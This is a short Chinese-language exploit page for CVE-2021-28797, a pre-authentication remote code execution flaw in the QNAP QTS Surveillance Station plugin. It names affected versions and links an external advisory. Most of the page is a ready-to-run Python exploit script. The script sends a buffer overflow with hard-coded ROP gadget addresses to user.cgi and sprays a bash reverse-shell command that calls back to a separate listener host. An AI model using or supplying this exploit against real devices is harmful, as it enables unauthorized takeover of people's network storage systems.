QNAP QTS Surveillance Station插件远程代码执行漏洞（CVE-2021-28797）

威联通监控管理系统Surveillance Station插件远程代码执行漏洞（CVE-2021-28797）

影响版本：

QNAP QTS 5.1.5.4.2
QNAP QTS 5.1.5.3.2

漏洞分析见：https://ssd-disclosure.com/ssd-advisory-qnap-pre-auth-cgi_find_parameter-rce/

Exploit.py：

import requests
import threading
from struct import *
p = lambda x: pack("<L", x)
def run(session, data):
    res = [session.post("http://192.168.1.2:8080/cgi-bin/surveillance/apis/user.cgi", data) for i in range(5000)]
def main():
    with requests.Session() as s:
                payload = "A" * 3108
                payload += p(0x74a8eb8c) # pop {r0, r4, pc}
                payload += p(0x71154e28) # heap address
                payload += "BBBB"
                payload += p(0x74a636c4 + 1) # system

                data = {
            "act" : "login",
            "sid" : payload,
            "slep" : "bash -i >& /dev/tcp/192.168.1.3/4321 0>&1;" * 0x5000 + "\x00" + "bash -i >& /dev/tcp/192.168.1.3/4321 0>&1;" * 0x5000,
                }
                for i in range(30):
                    t = threading.Thread(target=run, args=(s, data))
                    t.start()


if __name__ == '__main__':
    main()